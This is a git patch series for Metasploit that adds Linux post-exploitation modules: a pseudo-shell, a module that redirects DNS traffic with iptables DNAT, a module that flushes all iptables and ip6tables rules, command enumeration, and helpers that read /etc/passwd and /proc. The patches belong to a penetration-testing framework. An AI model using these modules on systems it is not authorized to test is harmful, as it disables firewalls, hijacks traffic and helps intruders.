resultado.class == Array + puts resultado.join("\n") + else + if resultado.strip() != "" + print resultado.chomp() + "\n" + end + end + end + rescue # begin + next + end # begin + end + end +end diff --git a/modules/post/linux/pepa/pepa_cat.rb b/modules/post/linux/pepa/pepa_cat.rb deleted file mode 100644 index dd36f73ee965..000000000000 --- a/modules/post/linux/pepa/pepa_cat.rb +++ /dev/null @@ -1,36 +0,0 @@ -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Post - include Msf::Post::File - include Msf::Post::Linux::Pepa - - def initialize - super( - 'Name' => 'PEPA Read File (cat without cat)', - 'Description' => %q{ - This module will be applied on a session connected to a shell. It will - extract content from a given file. - }, - 'Author' => 'Alberto Rafael Rodriguez Iglesias ', - 'License' => MSF_LICENSE, - 'Platform' => ['linux'], - 'SessionTypes' => ['shell'] - ) - register_options( - [ - OptString.new('FILENAME', [true, 'File path to read, default /etc/passwd','/etc/passwd']) - ]) - end - - def run - file = datastore['FILENAME'] - print_status("Doing cat without cat command in FILENAME: #{file}") - cat_result=pepa_cat(file) - cat_result.each do |line| - print_line(line) - end - end -end diff --git a/modules/post/linux/pepa/pepa_fingerprinting.rb b/modules/post/linux/pepa/pepa_fingerprinting.rb deleted file mode 100644 index 620c2f7aa38a..000000000000 --- a/modules/post/linux/pepa/pepa_fingerprinting.rb +++ /dev/null @@ -1,80 +0,0 @@ -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Post - include Msf::Post::File - include Msf::Post::Linux::Pepa - - def initialize - super( - 'Name' => 'PEPA Fingerprinting Module', - 'Description' => %q{ - This module will be applied on a session connected to a shell. It will - extract different information from target system. - }, - 'Author' => 'Alberto Rafael Rodriguez Iglesias ', - 'License' => MSF_LICENSE, - 'Platform' => ['linux'], - 'SessionTypes' => ['shell'] - ) - end - - def run - print_status(" -- Session Information --") - print "Current Shell: " + pepa_shell()[0] - current_user = pepa_whoami()[0] - print "\nCurrent User: " + current_user - print "\nIs Current User root?: " + pepa_isroot?(current_user)[0] - print "\nCurrent Shell PID: " + pepa_shell_pid().to_s - print "\n" - print "\n" - - print_status(" -- System Information --") - print "Current PATH env ($PATH): " + pepa_path()[0] - print "\n" - print "\n" - - print_status(" -- Network Information --") - print "\n" - print_good("List of local IPs:") - ips = pepa_ips() - ips.each do |ip| - print "\n" + ip - end - - print "\n" - print "\n" - print_good("List of local network interfaces:") - ifaces = pepa_interfaces() - ifaces.each do |iface| - print "\n" + iface - end - - print "\n" - print "\n" - print_good("List of local MAC addresses:") - macs = pepa_macs() - macs.each do |mac| - print "\n" +mac - end - - print "\n" - print "\n" - print_good("List of listening TCP ports:") - tcp_ports = pepa_listen_tcp_ports() - tcp_ports.each do |tcp_port| - print "\n" + tcp_port.to_s - end - - print "\n" - print "\n" - print_good("List of listening UDP ports:") - udp_ports = pepa_listen_udp_ports() - udp_ports.each do |udp_port| - print udp_port.to_s + "\n" - end - print "\n" - end -end diff --git a/modules/post/linux/pepa/pepa_ls.rb b/modules/post/linux/pepa/pepa_ls.rb deleted file mode 100644 index dcd292026319..000000000000 --- a/modules/post/linux/pepa/pepa_ls.rb +++ /dev/null @@ -1,40 +0,0 @@ -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Post - include Msf::Post::File - include Msf::Post::Linux::Pepa - - def initialize - super( - 'Name' => 'PEPA List Directory (ls without ls)', - 'Description' => %q{ - This module will be applied on a session connected to a shell. It will - extract a list of files and folders on a given dir. - }, - 'Author' => 'Alberto Rafael Rodriguez Iglesias ', - 'License' => MSF_LICENSE, - 'Platform' => ['linux'], - 'SessionTypes' => ['shell'] - ) - register_options( - [ - OptString.new('DIR', [false, 'Optional directory name to list, default current session path','']) - ]) - end - - def run - dir = datastore['DIR'] - if dir == "" - print_status("Doing ls without ls command in current session path DIR") - else - print_status("Doing ls without ls command in DIR: #{dir}") - end - ls_result=pepa_ls(dir) - ls_result.each do |line| - print_line(line) - end - end -end diff --git a/modules/post/linux/pepa/pepa_whoami.rb b/modules/post/linux/pepa/pepa_whoami.rb deleted file mode 100644 index f0df4534b20c..000000000000 --- a/modules/post/linux/pepa/pepa_whoami.rb +++ /dev/null @@ -1,29 +0,0 @@ -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Post - include Msf::Post::File - include Msf::Post::Linux::Pepa - - def initialize - super( - 'Name' => 'PEPA Whoami (whoami without whoami)', - 'Description' => %q{ - This module will be applied on a session connected to a shell. It will - extract current username. - }, - 'Author' => 'Alberto Rafael Rodriguez Iglesias ', - 'License' => MSF_LICENSE, - 'Platform' => ['linux'], - 'SessionTypes' => ['shell'] - ) - end - - def run - print_status("Doing whoami without whoami command") - whoami_result=pepa_whoami()[0] - print_line(whoami_result) - end -end From 53e6faef2798a1739c560ca72849d2dde66a2863 Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Tue, 19 Jun 2018 12:50:18 +0200 Subject: [PATCH 05/21] Module description fixed --- modules/post/linux/manage/pseudo_shell.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/linux/manage/pseudo_shell.rb b/modules/post/linux/manage/pseudo_shell.rb index d6060d05e4ff..fcdb1b3b5825 100644 --- a/modules/post/linux/manage/pseudo_shell.rb +++ b/modules/post/linux/manage/pseudo_shell.rb @@ -45,7 +45,7 @@ def initialize super( 'Name' => 'Pseudo-Shell Post-Exploitation Module', 'Description' => %q{ - This module will be for the run a Psudo-Shell. + This module will run a Pseudo-Shell. }, 'Author' => 'Alberto Rafael Rodriguez Iglesias ', 'License' => MSF_LICENSE, From 667f6cb570c3d6f994eff2cc9b865fd3e649366f Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Tue, 19 Jun 2018 14:30:00 +0200 Subject: [PATCH 06/21] Some minor fixes in pseudo_shell module and priv.rb --- lib/msf/core/post/linux/priv.rb | 4 ++-- modules/post/linux/manage/pseudo_shell.rb | 10 +++++----- 2 files changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/msf/core/post/linux/priv.rb b/lib/msf/core/post/linux/priv.rb index 8eecd3277d1c..d55ac9003814 100644 --- a/lib/msf/core/post/linux/priv.rb +++ b/lib/msf/core/post/linux/priv.rb @@ -33,8 +33,8 @@ def is_root? data.each_line do |line| line = line.split(":") user_passwd = line[0] - if user_passwd = user - if line[1] = 0 + if user_passwd == user + if line[3].to_i == 0 found = true end end diff --git a/modules/post/linux/manage/pseudo_shell.rb b/modules/post/linux/manage/pseudo_shell.rb index fcdb1b3b5825..01a41cadb6e1 100644 --- a/modules/post/linux/manage/pseudo_shell.rb +++ b/modules/post/linux/manage/pseudo_shell.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Post HELP_COMMANDS = [["help", "help", 0, "Show current help"], ["?", "help", 0, "Show current help"], - ["ls", "dir", 1, "List files and folders in a directory"], + ["ls", "dir", 1, "List files and folders in a directory"], ["cat", "read_file", 1, "Show file contents"], ["whoami", "whoami", 0, "Show current user"], ["cd", "cd", 1, "Change current directory"], @@ -74,7 +74,7 @@ def parse_cmd(cmd) args = parts[1] else nargs = 0 - end + end else args = "" end @@ -101,7 +101,7 @@ def help() printf("\t%-20s%-100s\n", linea[0], linea[3]) end print "\n" - end + end def prompt_show() promptshell = $vusername + "@" + $vhostname + ":" + pwd.strip() + "# " @@ -144,7 +144,7 @@ def prompt() end else if resultado.class == Array - puts resultado.join("\n") + print resultado.join("\n") else if resultado.strip() != "" print resultado.chomp() + "\n" @@ -152,7 +152,7 @@ def prompt() end end rescue # begin - next + next end # begin end end From 247437c8f3ce9b7a933272e903dbf41517b525f9 Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Thu, 21 Jun 2018 13:25:35 +0200 Subject: [PATCH 07/21] Change global variables to instance variables in pseudo_shell module and minor fix prompts's output --- modules/post/linux/manage/pseudo_shell.rb | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/modules/post/linux/manage/pseudo_shell.rb b/modules/post/linux/manage/pseudo_shell.rb index 01a41cadb6e1..db5ccd6fee48 100644 --- a/modules/post/linux/manage/pseudo_shell.rb +++ b/modules/post/linux/manage/pseudo_shell.rb @@ -38,8 +38,8 @@ class MetasploitModule < Msf::Post LIST.insert(-1, linea[0]) end -$vhostname = "" -$vusername = "" +@vhostname = "" +@vusername = "" def initialize super( @@ -55,8 +55,8 @@ def initialize end def run - $vhostname = get_hostname - $vusername = whoami + @vhostname = get_hostname + @vusername = whoami prompt() end @@ -104,7 +104,7 @@ def help() end def prompt_show() - promptshell = $vusername + "@" + $vhostname + ":" + pwd.strip() + "# " + promptshell = @vusername + "@" + @vhostname + ":" + pwd.strip() + "# " comp = proc { |s| LIST.grep(/^#{Regexp.escape(s)}/) } Readline.completion_append_character = " " Readline.completion_proc = comp @@ -145,6 +145,7 @@ def prompt() else if resultado.class == Array print resultado.join("\n") + print "\n" else if resultado.strip() != "" print resultado.chomp() + "\n" From 33e9d1abb064f4cf1437bc2115aecabdd828e91c Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Thu, 21 Jun 2018 13:56:32 +0200 Subject: [PATCH 08/21] clear_screen function added --- lib/msf/core/post/common.rb | 46 +++++++++++++++++++++++++++++++++---- 1 file changed, 41 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/post/common.rb b/lib/msf/core/post/common.rb index 90750e355033..47ea697b166b 100644 --- a/lib/msf/core/post/common.rb +++ b/lib/msf/core/post/common.rb @@ -2,6 +2,10 @@ module Msf::Post::Common + def clear_screen + Gem.win_platform? ? (system "cls") : (system "clear") + end + def rhost return nil unless session @@ -80,10 +84,31 @@ def has_pid?(pid) # # Returns a (possibly multi-line) String. # - def cmd_exec(cmd, args="", time_out=15) + def cmd_exec(cmd, args=nil, time_out=15) case session.type when /meterpreter/ + # + # The meterpreter API requires arguments to come separately from the + # executable path. This has no effect on Windows where the two are just + # blithely concatenated and passed to CreateProcess or its brethren. On + # POSIX, this allows the server to execve just the executable when a + # shell is not needed. Determining when a shell is not needed is not + # always easy, so it assumes anything with arguments needs to go through + # /bin/sh. + # + # This problem was originally solved by using Shellwords.shellwords but + # unfortunately, it is unsuitable. When a backslash occurs inside double + # quotes (as is often the case with Windows commands) it inexplicably + # removes them. So. Shellwords is out. + # + # By setting +args+ to an empty string, we can get POSIX to send it + # through /bin/sh, solving all the pesky parsing troubles, without + # affecting Windows. + # start = Time.now.to_i + if args.nil? and cmd =~ /[^a-zA-Z0-9\/._-]/ + args = "" + end session.response_timeout = time_out process = session.sys.process.execute(cmd, args, {'Hidden' => true, 'Channelized' => true}) @@ -99,6 +124,7 @@ def cmd_exec(cmd, args="", time_out=15) end end end + o.chomp! if o begin process.channel.close @@ -108,12 +134,22 @@ def cmd_exec(cmd, args="", time_out=15) process.close when /powershell/ - o = session.shell_command("#{cmd} #{args}", time_out) + if args.nil? || args.empty? + o = session.shell_command("#{cmd}", time_out) + else + o = session.shell_command("#{cmd} #{args}", time_out) + end + o.chomp! if o when /shell/ - o = session.shell_command_token("#{cmd} #{args}", time_out) + if args.nil? || args.empty? + o = session.shell_command_token("#{cmd}", time_out) + else + o = session.shell_command_token("#{cmd} #{args}", time_out) + end + o.chomp! if o end - - o ? o.chomp : "" + return "" if o.nil? + return o end def cmd_exec_get_pid(cmd, args=nil, time_out=15) From 5b60a91b6601ea6cea711dfeacbd3accd9e395f0 Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Thu, 12 Jul 2018 13:54:47 +0200 Subject: [PATCH 09/21] Style and code optimization changes --- lib/msf/core/post/file.rb | 72 +++++++++++------------ lib/msf/core/post/linux/priv.rb | 40 +++++-------- lib/msf/core/post/linux/system.rb | 25 +++----- lib/msf/core/post/unix.rb | 2 +- modules/post/linux/manage/pseudo_shell.rb | 46 +++++++-------- 5 files changed, 81 insertions(+), 104 deletions(-) diff --git a/lib/msf/core/post/file.rb b/lib/msf/core/post/file.rb index a27b8eff92b4..69a417d5ebc7 100644 --- a/lib/msf/core/post/file.rb +++ b/lib/msf/core/post/file.rb @@ -48,28 +48,29 @@ def pwd def dir(directory) if session.type == 'meterpreter' return session.fs.dir.entries(directory) - else - if session.platform == 'windows' - return session.shell_command_token("dir #{directory}").split(/[\r\n]+/) - else - if command_exists?("ls") - return session.shell_command_token("ls #{directory}").split(/[\r\n]+/) - else - # Result on systems without ls command - if directory[-1] != '/' - directory = directory + "/" - end - result = [] - data = session.shell_command_token("for fn in #{directory}*; do echo $fn; done") - parts = data.split("\n") - parts.each do |line| - line = line.split("/")[-1] - result.insert(-1,line) - end - return result - end - end end + + if session.platform == 'windows' + return session.shell_command_token("dir #{directory}").split(/[\r\n]+/) + end + + if command_exists?('ls') + return session.shell_command_token("ls #{directory}").split(/[\r\n]+/) + end + + # Result on systems without ls command + if directory[-1] != '/' + directory = directory + "/" + end + result = [] + data = session.shell_command_token("for fn in #{directory}*; do echo $fn; done") + parts = data.split("\n") + parts.each do |line| + line = line.split("/")[-1] + result.insert(-1, line) + end + + result end alias ls dir @@ -294,23 +295,22 @@ def file_remote_digestsha2(file_name) # @return [Array] of strings(lines) # def read_file(file_name) - data = nil - if session.type == "meterpreter" - data = _read_file_meterpreter(file_name) - elsif session.type == "shell" - if session.platform == 'windows' - data = session.shell_command_token("type \"#{file_name}\"") - else - if command_exists?("cat") - data = session.shell_command_token("cat \"#{file_name}\"") - else - # Result on systems without cat command - data = session.shell_command_token("while read line; do echo $line; done <#{file_name}") - end - end + if session.type == 'meterpreter' + return _read_file_meterpreter(file_name) + end + + return nil unless session.type == 'shell' + if session.platform == 'windows' + return session.shell_command_token("type \"#{file_name}\"") end - data + + if command_exists?('cat') + return session.shell_command_token("cat \"#{file_name}\"") + end + + # Result on systems without cat command + session.shell_command_token("while read line; do echo $line; done <#{file_name}") end # Platform-agnostic file write. Writes given object content to a remote file. diff --git a/lib/msf/core/post/linux/priv.rb b/lib/msf/core/post/linux/priv.rb index d55ac9003814..a628db835964 100644 --- a/lib/msf/core/post/linux/priv.rb +++ b/lib/msf/core/post/linux/priv.rb @@ -12,35 +12,23 @@ module Priv # @return [Boolean] # def is_root? - if command_exists?("id") - root_priv = false - user_id = cmd_exec("id -u") - clean_user_id = user_id.to_s.gsub(/[^\d]/,"") - unless clean_user_id.empty? - if clean_user_id =~ /^0$/ - root_priv = true - elsif clean_user_id =~ /^\d*$/ - root_priv = false - end - else + if command_exists?('id') + user_id = cmd_exec('id -u') + clean_user_id = user_id.to_s.gsub(/[^\d]/, '') + if clean_user_id.empty? raise "Could not determine UID: #{user_id.inspect}" end - return root_priv - else - user = whoami - found = false - data = cmd_exec("while read line; do echo $line; done = 1 - nargs = parts.length() - 1 - cmd = parts[0] - HELP_COMMANDS.each do |linea| - if linea[0] == cmd - func = linea[1] - if nargs >= 1 - if linea[2] == 1 - args = parts[1] - else - nargs = 0 - end - else - args = "" - end - return func, cmd, args, nargs + parts = cmd.split(' ') + return '' unless parts.length >= 1 + cmd = parts[0] + nargs = parts.length - 1 + HELP_COMMANDS.each do |linea| + next unless linea[0] == cmd + + func = linea[1] + if nargs >= 1 + if linea[2] == 1 + args = parts[1] + else + nargs = 0 end + else + args = '' end - error = get_shell_name - message = error + ": " + cmd + ": Command not exist\n" - print message - return message - else - return error + + return func, cmd, args, nargs end + + error = get_shell_name + message = "#{error}: #{cmd}: Command does not exist\n" + print message + message end def help() From 60becc272acb974b27cb0f57946a86f4508915af Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Thu, 12 Jul 2018 14:06:41 +0200 Subject: [PATCH 10/21] Native DNS Spoofing module added --- modules/post/linux/manage/dns_spoofing.rb | 35 +++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 modules/post/linux/manage/dns_spoofing.rb diff --git a/modules/post/linux/manage/dns_spoofing.rb b/modules/post/linux/manage/dns_spoofing.rb new file mode 100644 index 000000000000..d518a4a30cee --- /dev/null +++ b/modules/post/linux/manage/dns_spoofing.rb @@ -0,0 +1,35 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Post + include Msf::Post::File + include Msf::Post::Linux::System + + def initialize + super( + 'Name' => 'Native DNS Spoofing module', + 'Description' => %q{ + This module will be applied on a session connected to a shell. It will redirect DNS Request to remote DNS server. + }, + 'Author' => 'Alberto Rafael Rodriguez Iglesias ', + 'License' => MSF_LICENSE, + 'Platform' => ['linux'], + 'SessionTypes' => ['shell'] + ) + register_options( + [ + OptString.new('ORIGIN_PORT', [true, 'Origin port','53']), + OptString.new('DESTINY_PORT', [true, 'Destination port','53']), + OptAddress.new('DESTINY_IP', [true, 'Needed','8.8.8.8']) + ]) + end + + def run + print_good("Spoofing DNS server...") + cmd_exec("iptables -t nat -A OUTPUT -p udp --dport #{datastore['ORIGIN_PORT']} -j DNAT --to #{datastore['DESTINY_IP']}:#{datastore['DESTINY_PORT']}") + cmd_exec("iptables -t nat -A OUTPUT -p tcp --dport #{datastore['ORIGIN_PORT']} -j DNAT --to #{datastore['DESTINY_IP']}:#{datastore['DESTINY_PORT']}") + print_good("Successfully exploited.") + end +end From 93413481e8e86c56c3330a02b355134d98240e61 Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Thu, 12 Jul 2018 14:16:22 +0200 Subject: [PATCH 11/21] IPTABLES rules removal module added --- modules/post/linux/manage/iptables_removal.rb | 44 +++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 modules/post/linux/manage/iptables_removal.rb diff --git a/modules/post/linux/manage/iptables_removal.rb b/modules/post/linux/manage/iptables_removal.rb new file mode 100644 index 000000000000..eacd4f0cd392 --- /dev/null +++ b/modules/post/linux/manage/iptables_removal.rb @@ -0,0 +1,44 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Post + include Msf::Post::File + include Msf::Post::Linux::System + + def initialize + super( + 'Name' => 'IPTABLES rules removal', + 'Description' => %q{ + This module will be applied on a session connected to a shell. It will remove all IPTABLES rules. + }, + 'Author' => 'Alberto Rafael Rodriguez Iglesias ', + 'License' => MSF_LICENSE, + 'Platform' => ['linux'], + 'SessionTypes' => ['shell'] + ) + end + + def run + print_good("Deleting IPTABLES rules...") + cmd_exec("iptables -P INPUT ACCEPT") + cmd_exec("iptables -P FORWARD ACCEPT") + cmd_exec("iptables -P OUTPUT ACCEPT") + cmd_exec("iptables -t nat -F") + cmd_exec("iptable -t mangle -F") + cmd_exec("iptables -F") + cmd_exec("iptables -X") + + print_good("Deleting IP6TABLES rules...") + cmd_exec("ip6tables -P INPUT ACCEPT") + cmd_exec("ip6tables -P FORWARD ACCEPT") + cmd_exec("ip6tables -P OUTPUT ACCEPT") + cmd_exec("ip6tables -t nat -F") + cmd_exec("ip6table -t mangle -F") + cmd_exec("ip6tables -F") + cmd_exec("ip6tables -X") + + print_good("Module successfully executed.") + end +end From 259b92a64b60f1a2957d21dc758fb3ae9ff35af6 Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Tue, 14 Aug 2018 18:24:15 +0200 Subject: [PATCH 12/21] iptables_removal.rb module added --- modules/post/linux/manage/iptables_removal.rb | 44 +++++++++++-------- 1 file changed, 26 insertions(+), 18 deletions(-) diff --git a/modules/post/linux/manage/iptables_removal.rb b/modules/post/linux/manage/iptables_removal.rb index eacd4f0cd392..bfbbffcdfada 100644 --- a/modules/post/linux/manage/iptables_removal.rb +++ b/modules/post/linux/manage/iptables_removal.rb @@ -21,24 +21,32 @@ def initialize end def run - print_good("Deleting IPTABLES rules...") - cmd_exec("iptables -P INPUT ACCEPT") - cmd_exec("iptables -P FORWARD ACCEPT") - cmd_exec("iptables -P OUTPUT ACCEPT") - cmd_exec("iptables -t nat -F") - cmd_exec("iptable -t mangle -F") - cmd_exec("iptables -F") - cmd_exec("iptables -X") - print_good("Deleting IP6TABLES rules...") - cmd_exec("ip6tables -P INPUT ACCEPT") - cmd_exec("ip6tables -P FORWARD ACCEPT") - cmd_exec("ip6tables -P OUTPUT ACCEPT") - cmd_exec("ip6tables -t nat -F") - cmd_exec("ip6table -t mangle -F") - cmd_exec("ip6tables -F") - cmd_exec("ip6tables -X") - - print_good("Module successfully executed.") + if command_exists?("iptables") + print_good("Deleting IPTABLES rules...") + cmd_exec("iptables -P INPUT ACCEPT") + cmd_exec("iptables -P FORWARD ACCEPT") + cmd_exec("iptables -P OUTPUT ACCEPT") + cmd_exec("iptables -t nat -F") + cmd_exec("iptables -t mangle -F") + cmd_exec("iptables -F") + cmd_exec("iptables -X") + print_good("iptables rules successfully executed") + else + print_line("iptables rules could not be executed") + end + if command_exists?("ip6tables") + print_good("Deleting IP6TABLES rules...") + cmd_exec("ip6tables -P INPUT ACCEPT") + cmd_exec("ip6tables -P FORWARD ACCEPT") + cmd_exec("ip6tables -P OUTPUT ACCEPT") + cmd_exec("ip6tables -t nat -F") + cmd_exec("ip6table -t mangle -F") + cmd_exec("ip6tables -F") + cmd_exec("ip6tables -X") + print_good("ip6tables rules successfully executed") + else + print_line("ip6tables rules could not be executed") + end end end From 75ef8e8097e37ae1933ec2b03373ef7023a837ca Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Tue, 14 Aug 2018 18:31:16 +0200 Subject: [PATCH 13/21] enum_commands.rb module added --- modules/post/linux/gather/enum_commands.rb | 85 ++++++++++++++++++++++ 1 file changed, 85 insertions(+) create mode 100644 modules/post/linux/gather/enum_commands.rb diff --git a/modules/post/linux/gather/enum_commands.rb b/modules/post/linux/gather/enum_commands.rb new file mode 100644 index 000000000000..7a35f82e1251 --- /dev/null +++ b/modules/post/linux/gather/enum_commands.rb @@ -0,0 +1,85 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Post + include Msf::Post::File + include Msf::Post::Linux::System + + def initialize + super( + 'Name' => 'Testing commands needed in a function', + 'Description' => %q{ + This module will be applied on a session connected to a shell. It will check which commands are available in the system. + }, + 'Author' => 'Alberto Rafael Rodriguez Iglesias ', + 'License' => MSF_LICENSE, + 'Platform' => ['linux'], + 'SessionTypes' => ['shell'] + ) + register_options( + [ + OptString.new('DIR', [false, 'Optional directory name to list, default current session path','']) + ]) + end + + DIRS = [ + "/root/local/bin/", + "/usr/local/sbin/", + "/usr/local/bin/", + "/usr/sbin/", + "/usr/bin/", + "/sbin/", + "/bin/", + "/usr/local/go/bin/" + ] + + def run + dir = datastore['DIR'] + binaries = [] + + # Explore the $PATH directories + path_dirs = cmd_exec("echo $PATH").split(':') + path_dirs.each do |d| + elems = dir(d) + path = pwd() + elems.each do |elem| + binaries.insert(-1, "#{d}/#{elem}") + end + end + + # Explore common directories with binaries: + DIRS.each do |d| +# if dir_exist?(d) + elems = dir(d) + path = pwd() + elems.each do |elem| + binaries.insert(-1, "#{d}#{elem}") + end + end + + # Busybox commands + if command_exists?("busybox") + output = cmd_exec("busybox") + busybox_cmds = output.split(':')[-1].chomp.split(',') + busybox_cmds.each do |cmd| + binaries.insert(-1, "busybox #{cmd}") + print_good("busybox #{cmd}") + end + elsif command_exists?("/bin/busybox") + output = cmd_exec("(bin/busybox") + end + +# A recursive ls through the whole system could be added to find extra binaries + + binaries.uniq + binaries.sort + + print_good("The following binaries/commands are available") + binaries.each do |bin| + print_line("#{bin}") + end + + end +end From 9bf7bec870f8f9b494c3761037c845cf90e7e7a4 Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Tue, 14 Aug 2018 19:14:15 +0200 Subject: [PATCH 14/21] Multiple functions to simulate native commands added --- lib/msf/core/post/linux/priv.rb | 113 +++++++++++++++++++++++++++++++- 1 file changed, 111 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/post/linux/priv.rb b/lib/msf/core/post/linux/priv.rb index a628db835964..f251bb64fbb3 100644 --- a/lib/msf/core/post/linux/priv.rb +++ b/lib/msf/core/post/linux/priv.rb @@ -20,17 +20,126 @@ def is_root? end return clean_user_id.match(/^0$/) ? true : false end - user = whoami data = cmd_exec('while read line; do echo $line; done #{local_path}` + end + + def touch_cmd(new_path_file) + cmd_exec("> #{new_path_file}") + end + + def cp_cmd(origin_file, final_file) + file_origin = read_file(origin_file) + cmd_exec("echo '#{file_origin}' > #{final_file}") + end + + def pids() + dir_proc = "/proc/" + pids = [] + + directories_proc = dir(dir_proc) + directories_proc.each do |elem| + elem.gsub( / *\n+/, "") + if elem[-1] == '1' || elem[-1] == '2' || elem[-1] == '3' || elem[-1] == '4' || elem[-1] == '5' || elem[-1] == '6' || elem[-1] == '7' || elem[-1] == '8' || elem[-1] == '9' || elem[-1] == '0' + pids.insert(-1, elem) + end + end + + return pids.sort_by(&:to_i) + end + + def binary_of_pid(pid) + binary = read_file("/proc/#{pid}/cmdline") + if binary == "" #binary.empty? + binary = read_file("/proc/#{pid}/comm") + end + if binary[-1] == "\n" + binary = binary.split("\n")[0] + end + return binary + end + + def seq(first, increment, last) + result = [] + (first..last).step(increment) do |i| + result.insert(-1, i) + end + return result + end + + def wc_cmd(file) + [nlines_file(file), nwords_file(file), nchars_file(file), file] + end + + def nchars_file(file) + nchars = 0 + lines = read_file(file).split("\n") + nchars = lines.length() + lines.each do |line| + line.gsub(/[ ]/, ' ' => '') + nchars_line = line.length() + nchars = nchars + nchars_line + end + return nchars + end + + def nwords_file(file) + nwords = 0 + lines = read_file(file).split("\n") + lines.each do |line| + words = line.split(" ") + nwords_line = words.length() + nwords = nwords + nwords_line + end + return nwords + end + + def nlines_file(file) + lines = read_file(file).split("\n") + nlines = lines.length() + return nlines + end + + def head_cmd(file, nlines) + lines = read_file(file).split("\n") + result = lines[0..nlines-1] + return result + end + + def tail_cmd(file, nlines) + lines = read_file(file).split("\n") + result = lines[-1*(nlines)..-1] + return result + end + + def grep_cmd(file, string) + result = [] + lines = read_file(file).split("\n") + + lines.each do |line| + if line.include?(string) + result.insert(-1, line) + end + end + return result + end + + + end # Priv end # Linux end # Post From e43798b148974869838663391f8cd3f6d1f5f9e3 Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Tue, 14 Aug 2018 19:21:43 +0200 Subject: [PATCH 15/21] minor fix --- modules/post/linux/manage/iptables_removal.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/linux/manage/iptables_removal.rb b/modules/post/linux/manage/iptables_removal.rb index bfbbffcdfada..56fe26bd5f4a 100644 --- a/modules/post/linux/manage/iptables_removal.rb +++ b/modules/post/linux/manage/iptables_removal.rb @@ -41,7 +41,7 @@ def run cmd_exec("ip6tables -P FORWARD ACCEPT") cmd_exec("ip6tables -P OUTPUT ACCEPT") cmd_exec("ip6tables -t nat -F") - cmd_exec("ip6table -t mangle -F") + cmd_exec("ip6tables -t mangle -F") cmd_exec("ip6tables -F") cmd_exec("ip6tables -X") print_good("ip6tables rules successfully executed") From 8e109b4f20601adc9144cf28f3654d755219712a Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Tue, 14 Aug 2018 19:25:20 +0200 Subject: [PATCH 16/21] Some minor fixes --- lib/msf/core/post/linux/priv.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/post/linux/priv.rb b/lib/msf/core/post/linux/priv.rb index f251bb64fbb3..76cebe88ca40 100644 --- a/lib/msf/core/post/linux/priv.rb +++ b/lib/msf/core/post/linux/priv.rb @@ -30,7 +30,7 @@ def is_root? end # -# Multiple function for simulate native commands +# Multiple functions to simulate native commands added # def download_cmd(remote_path, local_path) From bb24c3114a16dcc096ff2172841794695847f56a Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Wed, 15 Aug 2018 04:49:17 +0200 Subject: [PATCH 17/21] Minor code style fixes made --- modules/post/linux/gather/enum_commands.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/linux/gather/enum_commands.rb b/modules/post/linux/gather/enum_commands.rb index 7a35f82e1251..a5ec03e42b57 100644 --- a/modules/post/linux/gather/enum_commands.rb +++ b/modules/post/linux/gather/enum_commands.rb @@ -72,7 +72,7 @@ def run end # A recursive ls through the whole system could be added to find extra binaries - + binaries.uniq binaries.sort From 3bf4726b15a59b624a946da8847a42b7c94b295b Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 15 Jan 2019 14:34:29 -0600 Subject: [PATCH 18/21] Fix pid_uid --- lib/msf/core/post/linux/system.rb | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/lib/msf/core/post/linux/system.rb b/lib/msf/core/post/linux/system.rb index 26d60272032c..df4627ca6396 100644 --- a/lib/msf/core/post/linux/system.rb +++ b/lib/msf/core/post/linux/system.rb @@ -218,12 +218,9 @@ def pidof(program) # @return [String] # def pid_uid(pid) - file_pid = "/proc/" + pid.to_s + "/status" - result = read_file(file_pid) - return result + read_file("/proc/#{pid}/status").to_s end - # # Checks if `file_path` is mounted on a noexec mount point # @return [Boolean] From 8b6807254b9b20b619180e9d2a9603dafeab57dd Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 24 Jan 2019 10:57:53 -0600 Subject: [PATCH 19/21] Fix whoami --- lib/msf/core/post/linux/system.rb | 8 ++++++++ lib/msf/core/post/unix.rb | 2 +- 2 files changed, 9 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/post/linux/system.rb b/lib/msf/core/post/linux/system.rb index 84d25da3670e..47c59686676a 100644 --- 